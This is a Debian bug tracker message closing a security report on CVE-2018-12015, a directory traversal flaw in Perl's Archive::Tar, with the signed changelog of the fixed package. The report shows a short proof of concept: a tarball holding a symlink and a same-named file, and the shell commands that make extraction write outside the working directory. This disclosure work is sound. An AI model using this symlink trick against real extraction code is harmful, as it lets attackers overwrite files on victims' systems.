Bug#900834: marked as done (perl: CVE-2018-12015: Archive::Tar: directory traversal)

[Debian Bug Tracking System]

Your message dated Sat, 09 Jun 2018 15:08:26 +0000
with message-id <e1frfte-0006ob...@fasolo.debian.org>
and subject line Bug#900834: fixed in perl 5.26.2-6
has caused the Debian Bug report #900834,
regarding perl: CVE-2018-12015: Archive::Tar: directory traversal
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
900834: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=900834
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

--- Begin Message ---

Source: perl
Version: 5.26.2-5
Tags: security





  $ tar -tvvf traversal.tar.gz
  lrwxrwxrwx root/root         0 2018-06-05 18:55 moo -> /tmp/moo
  -rw-r--r-- root/root         4 2018-06-05 18:55 moo

  $ pwd
  /home/jwilk

  $ ls /tmp/moo
  ls: cannot access '/tmp/moo': No such file or directory

  $ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'

  $ ls /tmp/moo
  /tmp/moo

--
Jakub Wilk

By default, the Archive::Tar module doesn't allow extracting files outside the current working directory. However, you can bypass this secure extraction mode easily by putting a symlink and a regular file with the same name into the tarball. I've attached proof of concept tarball, which makes Archive::Tar create /tmp/moo, regardless of what the current working directory is:

traversal.tar.gz
Description: application/gzip

--- End Message ---

--- Begin Message ---

Source: perl
Source-Version: 5.26.2-6

We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 900...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Dominic Hargreaves <d...@earth.li> (supplier of updated perl package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 09 Jun 2018 13:38:44 +0100
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.26 libperl-dev perl-modules-5.26 
perl
Architecture: source
Version: 5.26.2-6
Distribution: unstable
Urgency: high
Maintainer: Niko Tyni <nt...@debian.org>
Changed-By: Dominic Hargreaves <d...@earth.li>
Description:
 libperl-dev - Perl library: development files
 libperl5.26 - shared Perl library
 perl       - Larry Wall's Practical Extraction and Report Language
 perl-base  - minimal Perl system
 perl-debug - debug-enabled Perl interpreter
 perl-doc   - Perl documentation
 perl-modules-5.26 - Core Perl modules
Closes: 900834
Changes:
 perl (5.26.2-6) unstable; urgency=high
 .
   * [SECURITY] CVE-2018-12015: fix directory traversal vulnerability
     in Archive-Tar (Closes: #900834)
Checksums-Sha1:
 04a71eff631df54db5286fcbac58fc1ad7977c1d 2776 perl_5.26.2-6.dsc
 ebfd67b4bc36c0f89ed8a35af1a7cc5da76db7d3 167332 perl_5.26.2-6.debian.tar.xz
 9f080dfd0f0864a9c1e4df57f13f8433735e1186 5184 perl_5.26.2-6_source.buildinfo
Checksums-Sha256:
 8441ca46715247218cbc19cabd15126f4fbacd544b6ce6446ea7b2ba2541f16a 2776 
perl_5.26.2-6.dsc
 6b3a39b03e80498d7e0d02c544aa24d4d9fdfc4afd85a91375aa2685d882d178 167332 
perl_5.26.2-6.debian.tar.xz
 fd71e724ea48b4828c48af7104453780dc188328bcadeb7cf9593550bb14972f 5184 
perl_5.26.2-6_source.buildinfo
Files:
 99abfe79c6f0498735dc71dcdaf79714 2776 perl standard perl_5.26.2-6.dsc
 87a276b0bb1e43151a0e6490f130b22d 167332 perl standard 
perl_5.26.2-6.debian.tar.xz
 cb2a35df5f798150482b957eb6eeedf7 5184 perl standard 
perl_5.26.2-6_source.buildinfo

-----BEGIN PGP SIGNATURE-----

iQJBBAEBCAArFiEEy0llJ/kAnyscGnbawAV+cU1pT7IFAlsb3zUNHGRvbUBlYXJ0
aC5saQAKCRDABX5xTWlPstsOD/9zRnfCTFseLXuoSG2rVhRTuKagm234vLJ0LXTY
Y0g2Ol7Ayw8ABgyifYWqJDFs3WL70xWKdB3eLYsCSQD6jOPbSoTK1UjsavxD7tFG
bk72lVaDF8bSam/KEBIH67Ysb5/Y1tfBz3aWVE5z2fTOTbNDcph0cgvOfJ0SnU5h
3PF1FnZBJ91jpW279AIlbv+s4JbQZXXt9eUiZKT6WZnX5dOoEYTPG1Ky/ttwZFXv
ZA6xlTe+pyTaKvlQHOnKv76i8vWm6geQNzYMTde/tUqWv2a72Oq/HTcb7PiBYT/7
0JsdN2rWgq1tpTqAQ51MSZM3RkOZlgzT+J43iO9mxat6okzgORbyqEPwABbKXopd
L90PdvWoapLQFjrx5mQgZV+nyO8WhLXOKWir0zpOAZ/CjOhh249GdJaLplGOn11u
IAp8POD4or67dZxRro1x7YdkTV8GX6vkhWtEcKr7CnTRCDeNhe9jD8QUSClqN+a/
G1dAo7gaOrEBSCwdyWOiSQmmZyFykWCOPjl3/HiHFaC5t8C+SP64Qc+U0UzTa28/
u8uvUZ0uekSt+KGScXVP7jsVt1i8AQP/xTCCynsCdmOYpiLoJ793FyG0+VB1lnYz
8uRnHqBqcdizIZMnXUWnfvxV0AGLzMB3RCQLOZhdD8tipnsSJIsOZ12eMPcYFC6H
gJCkzA==
=OI+z
-----END PGP SIGNATURE-----

--- End Message ---